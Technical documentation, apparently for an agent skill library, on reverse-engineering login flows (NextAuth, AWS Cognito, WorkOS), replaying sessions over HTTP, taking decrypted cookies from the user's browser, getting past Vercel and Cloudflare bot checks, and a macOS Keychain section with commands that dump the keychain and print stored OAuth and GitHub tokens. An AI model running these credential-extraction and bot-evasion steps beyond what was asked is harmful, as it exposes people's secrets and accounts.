Form inspection — what a form POST sends
If the fetch interceptor captures nothing but the browser navigated somewhere new, the form did a native POST (full page navigation). Just inspect the form to see what it sends:
evaluate { script: "JSON.stringify(Array.from(document.querySelectorAll('form')).map(f => ({ action: f.action, method: f.method, inputs: Array.from(f.querySelectorAll('input')).map(i => ({ name: i.name, type: i.type, value: i.value ? '(has value)' : '(empty)' })) })))" }
This gives you the action URL, the method, and all input fields including
hidden ones (CSRF tokens, honeypots).
After the form submits, the browser lands on a new page. Check where you ended
up (url) and grab the cookies (cookies { domain: "..." }). That’s all
you need — the form POST did its job and set the session cookies.
Quick reference
Page load traffic? → capture_network
Button click / async? → Fetch interceptor
Nothing captured + URL changed? → Native form POST — inspect the <form>, then just grab the cookies after
Replaying with agentos.http
Once you understand what the browser does, replay it with agentos.http. The
goal is to get the same cookies without a browser.
Skills use agentos.http for all HTTP — never raw httpx/requests/urllib.
The http.headers() function builds the right header set for each request
type, and the engine sets zero default headers — Python controls them all.
Form POSTs
from agentos import http
headers = http.headers(mode="navigate") # browser-like headers for form POSTs
with http.client(headers=headers) as client:
resp = client.post("https://auth.example.com/api/auth/login", data={
"email": email,
"password": password,
"csrfToken": csrf_token,
})
session_cookies = dict(client.cookies)
http.client() follows redirects by default and handles the redirect chain
automatically — same as the browser. The cookies accumulate on the client.
Fetch/XHR calls
from agentos import http
headers = http.headers(accept="json") # API-appropriate headers
with http.client(headers=headers) as client:
resp = client.post("https://api.example.com/auth/login", json={
"email": email, "password": password
})
token = resp.json()["token"]
http.headers() knobs
The http.headers() function replaces the old profile= parameter. It builds
headers from explicit knobs — the engine sets nothing by default:
| Knob | What it does | Example |
|---|---|---|
waf= | Anti-bot headers (User-Agent, client hints) | http.headers(waf="cloudflare") |
accept= | Accept header type | http.headers(accept="json"), http.headers(accept="html") |
mode= | Fetch mode / navigation headers | http.headers(mode="navigate") |
extra= | Additional headers to merge | http.headers(extra={"X-Custom": "val"}) |
These compose: http.headers(waf="cloudflare", accept="json", mode="cors").
When replay doesn’t work
Sometimes the server does something specific to browser requests that
agentos.http can’t replicate (custom redirect handling, Cloudflare challenges,
JS-dependent cookie setting). When that happens:
- Use Playwright for that step. Let the browser handle it.
- Extract the cookies from Playwright after.
- Use
agentos.httpfor everything else (dashboard APIs, data extraction, etc.)
This isn’t a workaround — it’s the right architecture. Playwright handles the
login, agentos.http handles the work. Each tool does what it’s good at.
| Situation | Solution |
|---|---|
| Standard form POST or API call | agentos.http replay |
| Custom OTP/code verification | Scan JS bundles for custom endpoints → agentos.http replay (see discovery) |
| Google OAuth consent screen | Playwright first login → cookies → agentos.http after |
| Cloudflare JS challenge | Playwright or brave-browser.cookie_get for cf_clearance |
Vercel Security Checkpoint (429) | http.client(http2=False) — purely a JA4 fingerprint issue |
| CAPTCHA | Cookies from user’s real browser session |
| Unknown client-side token construction | Navigation API interceptor → read the actual URL (see discovery) |
Cookie injection from real browsers
The fastest way to do authenticated discovery. When the user is already
logged into a site in Brave/Firefox, skip the login flow entirely — extract
cookies from their real browser and inject them into Playwright or agentos.http.
The pattern
# 1. Get decrypted cookies from the user's browser
brave-browser.cookie_get({ domain: "goodreads.com" })
# → returns { cookies: [{name, value, domain, path, httpOnly, secure, ...}], count: 13 }
# 2a. Inject into Playwright for visual discovery
playwright.capture_network({
url: "https://www.goodreads.com/friend/find_friend",
cookies: [
{ name: "_session_id2", value: "443a469...", domain: "www.goodreads.com", path: "/" },
{ name: "at-main", value: "Atza|gQCkt...", domain: ".goodreads.com", path: "/" },
...
],
pattern: "**friend**",
wait: 5000
})
# → page loads authenticated, you can inspect/interact
# 2b. OR use http.client(cookies=...) for direct calls
from agentos import http
client = http.client(cookies={"_session_id2": "443a469...", "at-main": "Atza|gQCkt..."})
Why this matters
- No login flow needed. The user is already logged in. Don’t waste time reverse-engineering auth when you just need to see what a page looks like.
- Real session state. You get the exact cookies the browser has — including HttpOnly cookies, auth tokens, and CSRF state that would be hard to reproduce.
- Playwright stays authenticated. After injecting cookies into
capture_networkorgoto, the Playwright browser session keeps them. Subsequentclick,fill,inspectcalls stay logged in.
Cookie jar vs raw Cookie header
When making multi-step requests (e.g., fetch a form page, then submit
it), use http.client(cookies=...) instead of a raw Cookie header:
from agentos import http
# WRONG — raw header doesn't track Set-Cookie responses
client = http.client(headers={"Cookie": cookie_header})
# Step 1 may set a new _session_id2, but step 2 sends the OLD one
# RIGHT — cookie jar tracks Set-Cookie automatically
client = http.client(cookies={"_session_id2": "abc123", "at-main": "Atza|..."})
# Step 1's Set-Cookie is carried to step 2
This is critical when CSRF tokens (like Goodreads’ n= param) are tied to
the session cookie. If step 1 refreshes the session cookie but step 2 sends
the stale one, the server silently ignores the request.
Available cookie providers
| Provider | Tool | Notes |
|---|---|---|
brave-browser | cookie_get({ domain: "..." }) | Decrypts from Brave’s encrypted cookie DB |
firefox | cookie_get({ domain: "..." }) | Reads from Firefox profile |
playwright | cookie_get({ domain: "..." }) | From Playwright’s own browser session (after login) |
Working with Playwright
Practical notes for using the Playwright skill during discovery.
Use type, not fill, for React forms
React manages input state through synthetic events. fill sets the DOM value
directly, bypassing React — the component state stays empty and submit buttons
stay disabled. type sends real keystrokes that trigger onChange handlers.
# React form — use type
type { selector: "input[type=email]", text: "user@example.com" }
# Plain HTML form — either works
fill { selector: "input[type=email]", value: "user@example.com" }
If the submit button is disabled after entering text, you probably need type.
Watch for honeypot fields
Some login forms have hidden inputs designed to catch bots:
<input name="website" type="text" style="display:none">
These are invisible to users but bots that fill every field get caught. In
HTTPX replay, never include these fields. Common names: website, url,
homepage, company, fax.
If your HTTPX replay silently fails (200 response but nothing happens), check for honeypot fields you might be filling.
Navigate to dashboard, not auth
Always start at the dashboard URL. The auth domain needs the callbackUrl
parameter (set by the dashboard redirect) to know where to send you after
login. Going to auth directly often shows “accessed incorrectly” errors.
Clearing state for a fresh run
clear_cookies { domain: ".example.com" }
Useful when existing cookies skip you past the login page and you need to observe the full flow from scratch.
Auth patterns
NextAuth.js / Auth.js
The most common pattern for Next.js dashboards. Recognized by /api/auth/*
endpoints and next-auth.* cookies.
Quick identification:
GET /api/auth/csrfreturns a CSRF tokenGET /api/auth/providerslists available login methods- Session cookie:
next-auth.session-token(encrypted JWT, ~30 day expiry)
Email login flow (fully HTTPX for custom OTP sites):
GET /api/auth/csrf→ CSRF token (HTTPX)POST /api/auth/signin/email→ triggers email (HTTPX)POST /api/verify-otp→ verify code, get token components (HTTPX)GET /api/auth/callback/email?token=...→ session cookie set (HTTPX)
The key insight: many NextAuth sites with custom OTP code entry have a hidden
/api/verify-otp endpoint discoverable via JS bundle scanning. The callback
token format (hashedOtp:rawOtp) was discovered using the Navigation API
interceptor. See nextauth.md for the full deep dive.
Reference implementation: skills/exa/.
AWS Cognito
Common in gym/fitness SaaS (Approach, Mindbody, etc.). Pure AWS API calls — no browser needed at all.
from agentos import http
headers = http.headers(extra={
"X-Amz-Target": "AWSCognitoIdentityProviderService.InitiateAuth",
"Content-Type": "application/x-amz-json-1.1",
})
with http.client(headers=headers) as client:
resp = client.post(
"https://cognito-idp.us-east-1.amazonaws.com/",
content=json.dumps({
"AuthFlow": "USER_PASSWORD_AUTH",
"ClientId": client_id,
"AuthParameters": {"USERNAME": email, "PASSWORD": password},
}).encode(),
)
tokens = resp.json()["AuthenticationResult"]
# Use tokens["AccessToken"] as Bearer token
Find the ClientId in the app’s JS bundle — search for userPoolId or
userPoolClientId.
WorkOS
B2B auth platform. Supports SSO, social login, and email. Recognized by
workos_id in JWT claims.
See workos.md for the full deep dive.
Cookie-based sessions (generic)
For any site that uses session cookies without a framework like NextAuth:
- Walk through the login in Playwright
- Extract cookies:
cookies { domain: ".example.com" } - Use them with
http.client(cookies={...})
Reference implementations:
skills/claude/claude-login.py(Cloudflare-protected)skills/amazon/amazon.py(tiered cookie architecture, Siege bypass)
Tiered cookie architectures
Large services like Amazon use multiple cookie tiers for different access levels:
| Tier | Cookies | Access |
|---|---|---|
| Session | session-id, session-token, ubid-main | Browsing, search |
| Persistence | x-main | “Remember me” across sessions |
| Authentication | at-main (Atza|...), sess-at-main | Account pages, order history |
| SSO | sst-main (Sst1|...), sso-state-main | Cross-service auth |
When building a skill against a tiered service, you need the full cookie jar from a logged-in browser — not just the session cookie. The auth tokens are interdependent and the server validates them together.
Some cookies should be excluded (see 1-transport for cookie stripping) — encryption trigger cookies, WAF telemetry, etc. But the auth-tier cookies must all be present.
Auth boundaries
Not every operation needs a login. During discovery, classify each endpoint:
| Tier | Description | Example |
|---|---|---|
| Public | Works with just a frontend API key | Goodreads search, Exa search API |
| Suggested auth | Richer results with a session, but works without | Goodreads reviews (adds viewerHasLiked) |
| Required auth | Fails without session cookies | Dashboard APIs, mutations, user-specific data |
To map boundaries: send each request without auth. If you get data, it’s public. If you get partial data with errors on some fields, it’s suggested auth. If you get a 401/403 or an auth error, it’s required.
In the skill manifest, mark public operations with auth: none:
operations:
search: # public — no cookies
auth: none
get_api_keys: # requires dashboard session
connection: dashboard
Runtime config discovery
Some services rotate API keys or endpoints when they deploy. For these, build a multi-tier discovery chain that self-heals:
Tier 1: Cache instant, works until config rotates
Tier 2: Bundle extract 1-2s, parse the JS bundle for config
Tier 3: Browser capture 10-15s, load the page and capture network
Tier 4: Hardcoded instant, but may be stale
Note: File-based caching has been replaced by sandbox storage — the executor reads/writes
cachevals on the skill’s graph node. Seespec/sandbox-storage.md.
Implementation
def discover_runtime(**kwargs) -> dict:
cached = _load_cache()
if cached:
return cached
config = discover_from_bundle(kwargs.get("html_text"))
if config:
_save_cache(config)
return config
config = discover_via_browser(kwargs.get("page_url"))
if config:
_save_cache(config)
return config
return {"endpoint": FALLBACK_ENDPOINT, "api_key": FALLBACK_API_KEY}
Multi-environment bundles
Production JS bundles often ship configs for all environments. Pick Prod:
| Signal | Example |
|---|---|
shortName field | "shortName": "Prod" |
| Ads enabled | "showAds": true |
| Analytics enabled | "publishWebVitalMetrics": true |
Reference: skills/goodreads/public_graph.py discover_from_bundle().
Examples
| Skill | Pattern | What to learn from it |
|---|---|---|
skills/amazon/ | Tiered cookie auth, Siege encryption bypass, SESSION_EXPIRED retry | Full client hints, cookie stripping for anti-bot, session warming, provider retry convention |
skills/exa/ | NextAuth email code → fully HTTPX (no browser) → API keys | JS bundle scanning for custom endpoints, Navigation API interception, OTP token format discovery, Vercel http2=False bypass |
skills/goodreads/ | Multi-tier discovery, AppSync, auth boundary mapping | Bundle extraction, config rotation, public vs auth operations |
skills/claude/ | Cloudflare-protected cookie extraction | Stealth Playwright settings, HttpOnly cookies via CDP |
skills/austin-boulder-project/ | Bundle-extracted API key, tenant namespace | JS config scanning, namespace-as-auth |
Vendor guides
| Guide | When to read it |
|---|---|
| nextauth.md | Sites with /api/auth/* endpoints, next-auth.* cookies |
| workos.md | Sites with workos_id in JWT claims, WorkOS session IDs |
| macos-keychain.md | Native macOS apps, Electron Safe Storage, Google OAuth tokens, full credential audit |
NextAuth.js (Auth.js) Pattern
NextAuth.js (rebranded to Auth.js) is the most popular auth library for Next.js apps. Many SaaS dashboards use it for email login, Google SSO, and enterprise auth (via WorkOS or similar). Understanding its conventions accelerates reverse engineering because the endpoint structure, cookie names, and flow mechanics are predictable.
Part of Layer 3: Auth & Runtime. Discovered during the Exa skill reverse engineering session.
Recognizing NextAuth
Any of these signals indicate NextAuth:
| Signal | Example |
|---|---|
Auth endpoints at /api/auth/* | /api/auth/csrf, /api/auth/providers, /api/auth/session |
| CSRF cookie | __Host-next-auth.csrf-token (value is token%7Chash) |
| Callback URL cookie | __Secure-next-auth.callback-url |
| Session cookie | next-auth.session-token (JWT, HttpOnly, ~30 day expiry) |
| Separate auth subdomain | auth.example.com with redirects to dashboard.example.com |
| Provider list endpoint | GET /api/auth/providers returns JSON with provider configs |
Quick probe
capture_network { url: "https://auth.example.com", pattern: "**/api/auth/**", wait: 3000 }
If you see /api/auth/csrf and /api/auth/providers in the capture, it’s NextAuth.
Provider discovery
evaluate { script: "fetch('/api/auth/providers').then(r=>r.json()).then(d=>JSON.stringify(d))" }
Returns something like:
{
"email": { "id": "email", "name": "Email", "type": "email", "signinUrl": "/api/auth/signin/email" },
"google": { "id": "google", "name": "Google", "type": "oauth", "signinUrl": "/api/auth/signin/google" },
"workos": { "id": "workos", "name": "WorkOS", "type": "oauth", "signinUrl": "/api/auth/signin/workos" }
}
This tells you exactly which login methods are available before you try anything.
Endpoint map
All endpoints live under the auth domain’s /api/auth/ prefix.
| Endpoint | Method | Purpose |
|---|---|---|
/api/auth/csrf | GET | Returns { csrfToken: "..." } and sets the CSRF cookie |
/api/auth/providers | GET | Lists available auth providers with their signin URLs |
/api/auth/signin/email | POST | Triggers verification code/link email |
/api/auth/signin/google | POST | Initiates Google OAuth redirect |
/api/auth/callback/email | GET/POST | Handles email verification callback |
/api/auth/callback/google | GET | Handles Google OAuth callback |
/api/auth/session | GET | Returns current session (user info, expiry) |
/api/auth/signout | POST | Destroys session |
CSRF token
Every mutating request requires the CSRF token, obtained from /api/auth/csrf:
resp = client.get(f"{AUTH_BASE}/api/auth/csrf")
csrf_token = resp.json()["csrfToken"]
The response also sets a __Host-next-auth.csrf-token cookie. The value is
token%7Chash — the token and a hash separated by | (URL-encoded as %7C).
Both the cookie and the csrfToken field in the POST body must match.
Email verification flow
NextAuth’s email provider sends a verification code (or sometimes a magic link, depending on the site’s configuration). The standard flow:
Step 1: Trigger the email (HTTPX-compatible)
csrf_token = _get_csrf_token(client)
client.post(
f"{AUTH_BASE}/api/auth/signin/email",
data={
"email": email,
"csrfToken": csrf_token,
"callbackUrl": "https://dashboard.example.com/",
"json": "true",
},
headers={"Content-Type": "application/x-www-form-urlencoded"},
)
This sends the verification email. The response is typically { "url": "..." }
pointing to a “check your email” page.
Step 2: Code/token submission
Standard NextAuth uses a magic link that hits:
GET /api/auth/callback/email?callbackUrl=...&token=TOKEN&email=EMAIL
Where TOKEN is the raw verification token. NextAuth hashes it as
SHA256(token + NEXTAUTH_SECRET) and compares with the stored hash.
Custom OTP implementations (e.g. Exa) display a 6-digit code entry page instead of a magic link. These typically have a custom verification endpoint:
POST /api/verify-otp
Body: {"email": "user@example.com", "otp": "123456"}
→ {"email": "...", "hashedOtp": "$2a$10$...", "rawOtp": "123456"}
The client-side JS then constructs the NextAuth callback token from the response and redirects to the standard callback:
GET /api/auth/callback/email?token=HASHED_OTP:RAW_OTP&email=EMAIL&callbackUrl=...
The token format is {hashedOtp}:{rawOtp} — bcrypt hash, colon, raw code.
This is fully replayable via HTTPX. No browser needed.
Discovery playbook for custom OTP flows
When the standard NextAuth callback fails with error=Verification, the site
has a custom OTP layer. Follow these steps to crack it:
Step A: Scan JS bundles for custom endpoints
# Search terms that reveal custom auth endpoints
scan_bundles(auth_url, [
"verify-otp", "verify-code", "confirm-code", # custom verification
"callback/email", "hashedOtp", "rawOtp", # token construction
"fetch(", "/api/", # general API calls
])
Look for fetch("/api/verify-...") calls in the bundle context. The
surrounding code usually reveals the request shape and response handling.
Step B: Read the library source
Check what the server expects. For NextAuth, the key file is
callback/index.ts.
The email handler does createHash(token + secret) — this tells you the
token parameter must match what the server originally stored.
Step C: Intercept the client-side token construction
If the bundle shows the endpoint but the token construction is complex or spread across minified closures, use the Navigation API interceptor:
evaluate { script: "navigation.addEventListener('navigate', (e) => { window.__intercepted_nav_url = e.destination.url; e.preventDefault(); }); 'interceptor installed'" }
Then trigger the action:
click { selector: "button:text-is('VERIFY CODE')" }
evaluate { script: "window.__intercepted_nav_url" }
The captured URL will contain the fully-assembled token, e.g.:
https://auth.exa.ai/api/auth/callback/email?token=$2a$10$...%3A123456&email=...
URL-decode it and the format is obvious: {bcrypt_hash}:{raw_otp}.
Step D: Replay with HTTPX
Now you know the full flow — reproduce it with HTTPX:
POST /api/verify-otpwith{email, otp}→ get{hashedOtp, rawOtp}- Construct
token = f"{hashedOtp}:{rawOtp}" GET /api/auth/callback/email?token=...&email=...→ session cookie
See Discovery: JS Bundle Scanning and Discovery: Navigation API Interception for the general techniques.
Step 3: Session establishment
After successful verification (either path), the server sets the
next-auth.session-token cookie and redirects to the callback URL.
Validate the session:
resp = client.get(f"{DASHBOARD_BASE}/api/auth/session")
session = resp.json()
# { "user": { "email": "...", "id": "...", "teams": [...] }, "expires": "..." }
Cookie anatomy
| Cookie | Domain | HttpOnly | Secure | SameSite | Expiry | Purpose |
|---|---|---|---|---|---|---|
__Host-next-auth.csrf-token | auth domain | Yes | Yes | Lax | Session | CSRF double-submit |
__Secure-next-auth.callback-url | auth domain | Yes | Yes | Lax | Session | Where to redirect after auth |
next-auth.session-token | .parent-domain | Yes | Yes | Lax | ~30 days | JWT session (the important one) |
Cross-domain note: The session token is typically scoped to the parent domain
(e.g. .exa.ai) so it works across both auth.exa.ai and dashboard.exa.ai.
The CSRF and callback cookies are scoped to the auth subdomain only.
For HTTPX replay, you only need next-auth.session-token for authenticated
API calls. The CSRF and callback cookies are only needed during the login flow
itself.
Session token (JWT)
The next-auth.session-token is an encrypted JWT (JWE with A256GCM). You
can’t decode it without the server’s secret — but you don’t need to. Just pass
it as a cookie to authenticated endpoints.
# Use http2=False for Vercel-hosted dashboards (Security Checkpoint blocks h2)
# Use http2=True for other hosts (CloudFront, plain Cloudflare, etc.)
with httpx.Client(
http2=False, # adjust per host — see 1-transport
follow_redirects=True,
cookies={"next-auth.session-token": session_token},
) as client:
resp = client.get(f"{DASHBOARD_BASE}/api/get-api-keys")
The server decodes the JWT server-side and returns the session info via
/api/auth/session. See Transport: http2 selection
for how to determine the right setting per host.
Gotchas
Auth subdomain vs dashboard domain
Many NextAuth sites separate auth and dashboard onto different subdomains.
Navigate to the dashboard domain (e.g. https://dashboard.exa.ai), not the
auth domain directly. The dashboard redirects to auth with the correct
callbackUrl parameter. Going to auth directly often shows “accessed
incorrectly” errors because the callback URL is missing.
Honeypot fields
Some NextAuth login forms include hidden honeypot fields (e.g.
input[name="website"]). Never fill these in HTTPX replay. See
Playwright Discovery Gotchas for details.
React forms need type not fill
NextAuth login pages built with React/Next.js require Playwright’s type
command (real keystrokes) rather than fill (direct DOM manipulation). fill
bypasses React’s synthetic event system and leaves form state empty. See
Playwright Discovery Gotchas.
Vercel Security Checkpoint
Many NextAuth dashboards are hosted on Vercel. Vercel’s Security Checkpoint
blocks httpx(http2=True) outright — returning 429 with a JS challenge
page regardless of cookies or headers. The fix is httpx(http2=False).
This is purely a JA4 TLS fingerprint issue. httpx’s h2 fingerprint is well-known to Vercel’s bot detection. h1 is less distinctive and passes. See Layer 1: Transport for the full analysis.
Not every Vercel subdomain enables the checkpoint. Test each one — during
Exa reverse engineering, auth.exa.ai accepted h2 while dashboard.exa.ai
rejected it. The checkpoint is a per-project Vercel Firewall setting.
Cloudflare protection
Some NextAuth sites sit behind Cloudflare (separate from Vercel’s layer)
and set a cf_clearance cookie after a JS challenge. cf_clearance is
bound to the client’s TLS fingerprint and IP — it only works from the
same fingerprint that solved the challenge.
In practice, for Vercel-hosted dashboards the http2=False fix is
sufficient and cf_clearance isn’t needed. Store it if available (it’s
cheap insurance), but don’t depend on it for HTTPX access.
Dashboard API patterns
Once authenticated, NextAuth dashboards typically expose REST APIs under
/api/. These are standard Next.js API routes — no special auth headers needed,
just the session cookie.
Common patterns discovered during reverse engineering:
| Endpoint pattern | What it returns |
|---|---|
/api/auth/session | User profile, team memberships, feature flags |
/api/get-api-keys | API keys (may include full values!) |
/api/get-teams | Team info, rate limits, billing, usage |
/api/create-api-key | Creates a new key (POST, JSON body) |
/api/service-api-keys?teamId= | Service-level keys (separate from user keys) |
Always check raw API responses. Dashboard UIs routinely mask sensitive
values (API keys, tokens) client-side, but the underlying API returns them in
full. During reverse engineering, use capture_network on authenticated pages
and read the complete JSON response bodies.
See Dashboard APIs leak more than the UI for the general pattern.
Real-world example: Exa
Exa (dashboard.exa.ai / auth.exa.ai) is the reference implementation for
this pattern in the agentOS skill library. The entire email login flow is
browser-free — every step uses HTTPX.
Architecture:
- Auth domain:
auth.exa.ai(NextAuth.js, Vercel-hosted) - Dashboard domain:
dashboard.exa.ai(Vercel-hosted, Security Checkpoint enabled) - Providers:
email,google,workos - Email verification: 6-digit OTP code (custom
/api/verify-otpendpoint) - Session: encrypted JWT in
next-auth.session-tokenon.exa.ai - Transport:
httpx(http2=False)for dashboard (Vercel checkpoint blocks h2)
Skill operations:
send_login_code— triggers verification email via HTTPXverify_login_code— verifies OTP code, constructs token, completes login (fully HTTPX)store_session_cookies— fallback for Google SSO (Playwright cookies)get_api_keys— lists keys (full values inidfield) via HTTPXget_teams— team info, rate limits, credits via HTTPXcreate_api_key— creates a new key via HTTPX
Key findings:
- The
idfield in/api/get-api-keysis the full API key value (UUID format). The dashboard masks it, but the API returns it unmasked. - The custom OTP endpoint (
POST /api/verify-otp) was found via JS bundle scanning — it doesn’t appear in any NextAuth documentation. - The callback token format (
hashedOtp:rawOtp) was discovered using the Navigation API interceptor in Playwright, then replayed entirely with HTTPX.
How it was reverse-engineered (summary):
- Identify framework:
GET /api/auth/providers→ NextAuth - Try standard flow:
POST /api/auth/signin/email→ sends code OK;GET /api/auth/callback/email?token=CODE→error=Verification(6-digit code isn’t the raw token NextAuth expects) - Scan JS bundles: search for
verify-otp,callback/email,fetch(→ foundPOST /api/verify-otpaccepting{email, otp}returning{hashedOtp, rawOtp} - Read library source: NextAuth’s
callback/index.tsshows the server doesSHA256(token + secret)— so the token must be the pre-hash value - Intercept with Navigation API: inject
navigation.addEventListener, click “VERIFY CODE”, capture the destination URL → token format is{hashedOtp}:{rawOtp}(bcrypt hash, colon, raw OTP) - Replay with HTTPX:
POST /api/verify-otp→ construct token →GET /api/auth/callback/email?token=...→ session cookie set
See skills/exa/exa.py and skills/exa/readme.md for the full implementation.
Comparison with WorkOS
| Aspect | NextAuth | WorkOS |
|---|---|---|
| Where it lives | In the app (Next.js API routes) | External auth service |
| JWT decoding | Encrypted (JWE), opaque | Standard JWT, decodable |
| Session storage | Cookie-based (JWT in cookie) | Cookie or token-based |
| Token refresh | Automatic via session cookie | Explicit refresh token flow |
| Identification | /api/auth/* routes, next-auth.* cookies | workos in JWT iss, workos_id claim |
| Multi-tenant | App-specific | Built-in organization/team support |
See WorkOS Auth Pattern for the WorkOS-specific methodology.
WorkOS Auth Pattern
WorkOS is a B2B auth platform used by many SaaS and desktop apps. It started as an enterprise SSO product (SAML, SCIM) but added WorkOS User Management in 2023 — a full-stack auth system covering consumer sign-up, social login, and enterprise SSO in one package.
Part of Layer 3: Auth & Runtime. See also Electron deep dive for how WorkOS tokens are stored in Electron apps.
Recognizing WorkOS
The JWT iss (issuer) claim will contain workos or point to a custom auth
domain backed by WorkOS:
{
"iss": "https://auth.granola.ai/user_management/client_01JZJ0X...",
"workos_id": "user_01K2JVZM...",
"external_id": "c3b1fa46-...",
"sid": "session_01KH4JGG...",
"sign_in_method": "CrossAppAuth"
}
Key claims:
| Claim | Meaning |
|---|---|
workos_id | WorkOS-native user ID (user_01...) |
external_id | Previous auth provider’s user UUID (preserved on migration) |
sid | WorkOS session ID (session_01...) |
sign_in_method | How the session was created: SSO, Password, GoogleOAuth, CrossAppAuth |
iss | Contains /user_management/client_<id> for WorkOS User Management |
Token File Shape
Apps that store WorkOS tokens locally typically use one of these shapes:
Post-migration (Supabase → WorkOS)
{
"workos_tokens": "{\"access_token\":\"eyJ...\",\"refresh_token\":\"...\",\"expires_in\":21599,\"obtained_at\":1234567890,\"session_id\":\"session_01...\",\"external_id\":\"uuid\",\"sign_in_method\":\"CrossAppAuth\"}",
"session_id": "session_01...",
"user_info": "{\"id\":\"uuid\",\"email\":\"...\"}"
}
Note: workos_tokens is a JSON string (double-encoded), not an object.
import json
with open("supabase.json") as f:
raw = json.load(f)
tokens = json.loads(raw["workos_tokens"]) # parse the inner string
access_token = tokens["access_token"]
refresh_token = tokens["refresh_token"]
expires_in = tokens["expires_in"] # seconds
obtained_at = tokens["obtained_at"] # ms epoch
Native WorkOS storage
Some apps store tokens more directly:
{
"access_token": "eyJ...",
"refresh_token": "...",
"token_type": "Bearer",
"expires_in": 3600
}
Token Lifecycle
WorkOS access tokens are short-lived (typically 6 hours / 21600s).
import time, json, base64
def is_expired(token: str, buffer_s: int = 300) -> bool:
payload = token.split('.')[1]
payload += '=' * (4 - len(payload) % 4)
claims = json.loads(base64.urlsafe_b64decode(payload))
return claims['exp'] < time.time() + buffer_s
def get_token(token_file: str) -> str:
with open(token_file) as f:
raw = json.load(f)
tokens = json.loads(raw.get("workos_tokens", "{}")) or raw
access = tokens["access_token"]
if is_expired(access):
# Option A: open the app to refresh
# Option B: call the WorkOS refresh endpoint directly
raise ValueError("Token expired — open the app to refresh")
return access
Refreshing without the app
If you have the refresh_token and client_id, you can refresh directly:
import httpx, json
def refresh_workos_token(refresh_token: str, client_id: str, auth_domain: str) -> dict:
"""auth_domain e.g. 'https://auth.granola.ai'"""
resp = httpx.post(f"{auth_domain}/user_management/authenticate", json={
"client_id": client_id,
"grant_type": "refresh_token",
"refresh_token": refresh_token,
})
resp.raise_for_status()
return resp.json()
The client_id is embedded in the iss claim:
https://auth.example.com/user_management/client_01JZJ0X... →
client_01JZJ0X...
Calling the API
WorkOS-protected APIs expect a standard Bearer token plus usually some app-specific identity headers. Always check the bundle for custom headers before assuming a 401 is a token problem:
import json, httpx
from pathlib import Path
TOKEN_FILE = Path.home() / "Library/Application Support/AppName/supabase.json"
def get_headers() -> dict:
with open(TOKEN_FILE) as f:
raw = json.load(f)
tokens = json.loads(raw["workos_tokens"])
return {
"Authorization": f"Bearer {tokens['access_token']}",
"X-Client-Version": "1.0.0", # from app package.json
"X-Client-Platform": "darwin",
# Add X-Workspace-Id, X-Device-Id etc. if the app sends them
}
with httpx.Client(http2=True) as client:
resp = client.post("https://api.example.com/v1/some-endpoint",
json={"param": "value"},
headers=get_headers())
print(resp.json())
Supabase → WorkOS Migration
Many companies migrated from Supabase Auth to WorkOS. Signs you’ve hit a migrated app:
- Token file named
supabase.jsonbut containsworkos_tokenskey - JWT has both
workos_idandexternal_id(the old Supabase UUID) isspoints to a custom domain (notsupabase.co)- Database tables still use the old Supabase UUID as primary key
The migration preserves the old UUID as external_id precisely so FK
constraints don’t need to be updated.
Why migrate? Supabase Auth is great for consumer apps; WorkOS adds enterprise SSO (SAML/OIDC), SCIM directory sync, and an admin portal. B2B SaaS companies migrate when enterprise customers demand SSO.
Common migration path:
Supabase Auth → WorkOS User Management → (optionally) full WorkOS SSO
Competitors in this space: Clerk (more consumer/Next.js focused), Auth0 (enterprise, heavyweight), Stytch (developer-first).
macOS Keychain — Credential Audit & Token Extraction
The macOS Keychain is where native apps store OAuth tokens, API keys, session credentials, and encryption keys. For skill development, it’s the primary source for credentials held by desktop apps (Mimestream, Cursor, GitHub CLI, etc.).
What the Keychain Actually Contains
Running a full Keychain dump reveals the complete credential landscape of a machine:
security dump-keychain 2>/dev/null | grep '"svce"\|"acct"'
What you’ll find falls into predictable categories:
1. Native app OAuth tokens
Apps that do their own OAuth login store per-account tokens under a service name that identifies the app and account:
"svce" = "Mimestream: user@example.com"
"acct" = "OAuth"
security find-generic-password -s "Mimestream: user@example.com" -a "OAuth" -w
returns a binary plist containing access_token, refresh_token, expires_in,
client_id, and token_url. This is exactly what mimestream.credential_get
reads.
2. Electron “Safe Storage” encryption keys
Every Chromium-based app (Brave, Chrome, Cursor, Slack, Discord, VS Code, etc.) stores a single master key in the Keychain:
"svce" = "Brave Safe Storage"
"svce" = "Cursor Safe Storage"
"svce" = "Slack Safe Storage"
"svce" = "discord Safe Storage"
This key encrypts everything the app stores locally — saved passwords, OAuth tokens, session cookies, localStorage. The encrypted data lives in:
~/Library/Application Support/<AppName>/
Local Storage/leveldb/ ← encrypted
Cookies ← SQLite, values encrypted
Login Data ← Chromium password manager
To read any of those, you need the Safe Storage key first. The key is not guarded by an ACL in most cases — any process running as the same user can read it silently without prompting.
3. CLI tool OAuth tokens
"svce" = "gh:github.com"
"acct" = "username"
The GitHub CLI (gh) stores OAuth tokens here, one entry per account.
security find-generic-password -s "gh:github.com" -a "username" -w
returns the token directly.
4. API keys stored by apps
Some apps store their API keys directly:
"acct" = "raycast_ai_anthropic_apikey"
"acct" = "raycast_ai_openRouterAPIKey"
"acct" = "search_tavily_BLoLA9AB"
These are direct string values — no OAuth, no structure. One security call
returns the key.
5. App session tokens
"svce" = "cursor-access-token"
"svce" = "cursor-refresh-token"
"acct" = "cursor-user"
SaaS desktop apps that use their own auth (not Electron’s Safe Storage pattern) store session tokens directly as named items.
6. Password manager infrastructure (1Password)
"svce" = "1Password:domain-key-acls"
"svce" = "1Password:device-unlock-ask-again-after"
1Password stores its internal device unlock keys and domain key ACL mappings in the Keychain. These are protected — 1Password sets proper ACLs on its items so other processes can’t read them silently. This is the exception; most apps don’t bother with ACLs.
Three Google OAuth Patterns on macOS
Not all Google-authorized apps look the same locally. When you check
myaccount.google.com/permissions, the entries come from three distinct
mechanisms — each with different detection methods and different local traces.
Pattern 1: Native PKCE apps (Info.plist URL scheme)
Apps like Mimestream, BusyContacts, and Strongbox embed a Google
client ID directly in their app bundle. They register a reversed client ID
as a URL scheme in Info.plist — this is how Google redirects the auth code
back to the app after the user approves.
com.googleusercontent.apps.1064022179695-5793e1qdeuvrmvi5bfgg3rcv3aj62nfb
Reverse it to get the client ID:
1064022179695-5793e1qdeuvrmvi5bfgg3rcv3aj62nfb.apps.googleusercontent.com
These are “public clients” — the client ID is public by design. What protects the user is PKCE during login and the refresh token afterward (see sections below).
Detection: Scan Info.plist URL schemes for googleusercontent.apps.
Where to scan: Apps install in multiple locations — scanning only
/Applications/*.app misses a lot:
# All common install locations
